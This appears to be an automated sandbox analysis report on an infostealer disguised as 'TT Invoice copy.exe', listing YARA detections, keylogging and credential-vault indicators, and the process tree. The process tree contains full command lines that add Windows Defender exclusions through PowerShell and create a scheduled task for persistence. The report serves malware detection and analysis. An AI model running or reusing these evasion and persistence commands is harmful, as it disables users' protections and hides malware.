                        Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to log keystrokes (.Net Source)
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, J4qms1IPBw.cs.Net Code: DPj9
                        Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, J4qms1IPBw.cs.Net Code: DPj9

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        .NET source code contains very large array initializations
                        Source: 0.2.TT Invoice copy.exe.27fa198.3.raw.unpack, SQL.csLarge array initialization: : array initializer size 13797
                        Initial sample is a PE file and has a suspicious name
                        Source: initial sampleStatic PE information: Filename: TT Invoice copy.exe
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_00E304780_2_00E30478
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_00E300400_2_00E30040
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_00E367800_2_00E36780
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_00E677900_2_00E67790
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_0526E6380_2_0526E638
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_05265F2F0_2_05265F2F
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_05265F400_2_05265F40
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_0526EEA80_2_0526EEA8
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_0526EA700_2_0526EA70
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_01014AC88_2_01014AC8
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_0101D0378_2_0101D037
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_01013EB08_2_01013EB0
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_010141F88_2_010141F8
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_056687F08_2_056687F0
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_0566C6D88_2_0566C6D8
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_056681108_2_05668110
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_056670588_2_05667058
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_056667438_2_05666743
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_056660088_2_05666008
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_056603908_2_05660390
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_05663AC88_2_05663AC8
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_023184BC9_2_023184BC
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_023177909_2_02317790
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_045004789_2_04500478
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_045000409_2_04500040
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_04505A009_2_04505A00
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_0687E6389_2_0687E638
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_0687EEA89_2_0687EEA8
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_06875F2F9_2_06875F2F
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_06875F409_2_06875F40
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_0687EA709_2_0687EA70
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 13_2_016C4AC813_2_016C4AC8
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 13_2_016CD03613_2_016CD036
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 13_2_016C3EB013_2_016C3EB0
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 13_2_016C41F813_2_016C41F8
                        Source: TT Invoice copy.exe, 00000000.00000002.1681301766.0000000002825000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8b3ab6fc-321c-43a0-b410-2c0cfa8aa0d5.exe4 vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8b3ab6fc-321c-43a0-b410-2c0cfa8aa0d5.exe4 vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000000.00000002.1679317215.0000000000ACE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000000.00000002.1681301766.00000000027D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000000.00000000.1633656764.00000000003E0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLhbE.exe4 vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000000.00000002.1684161912.0000000004E20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000000.00000002.1685871533.0000000006FB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000008.00000002.2884747888.000000000043E000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename8b3ab6fc-321c-43a0-b410-2c0cfa8aa0d5.exe4 vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000008.00000002.2885395199.0000000000B38000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs TT Invoice copy.exe
                        Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dll vs TT Invoice copy.exe
                        Source: TT Invoice copy.exeBinary or memory string: OriginalFilenameLhbE.exe4 vs TT Invoice copy.exe
                        Source: TT Invoice copy.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: TT Invoice copy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: pUAQmWA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: TT Invoice copy.exe, b4g.csCryptographic APIs: 'CreateDecryptor'
                        Source: pUAQmWA.exe.0.dr, b4g.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, Lds5plxAPDj.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, LZYJybC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, wDxPSW1p.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, E0w8WLnyggK.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, ZBSJHga2buE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, M4oIYVa.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, kSS2HMsB8.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, kSS2HMsB8.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, Fe6Q71Wm6WhO9Yp10w.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, Fe6Q71Wm6WhO9Yp10w.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.csSecurity API names: _0020.AddAccessRule
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/15@2/2
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeFile created: C:\Users\user\AppData\Roaming\pUAQmWA.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7220:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMutant created: \Sessions\1\BaseNamedObjects\QcSyIPuvQYpIvjkb
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3165.tmpJump to behavior
                        Source: TT Invoice copy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: TT Invoice copy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: TT Invoice copy.exeReversingLabs: Detection: 47%
                        Source: TT Invoice copy.exeVirustotal: Detection: 51%
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeFile read: C:\Users\user\Desktop\TT Invoice copy.exe:Zone.IdentifierJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\TT Invoice copy.exe "C:\Users\user\Desktop\TT Invoice copy.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Users\user\Desktop\TT Invoice copy.exe "C:\Users\user\Desktop\TT Invoice copy.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\pUAQmWA.exe C:\Users\user\AppData\Roaming\pUAQmWA.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess created: C:\Users\user\AppData\Roaming\pUAQmWA.exe "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Users\user\Desktop\TT Invoice copy.exe "C:\Users\user\Desktop\TT Invoice copy.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess created: C:\Users\user\AppData\Roaming\pUAQmWA.exe "C:\Users\user\AppData\Roaming\pUAQmWA.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
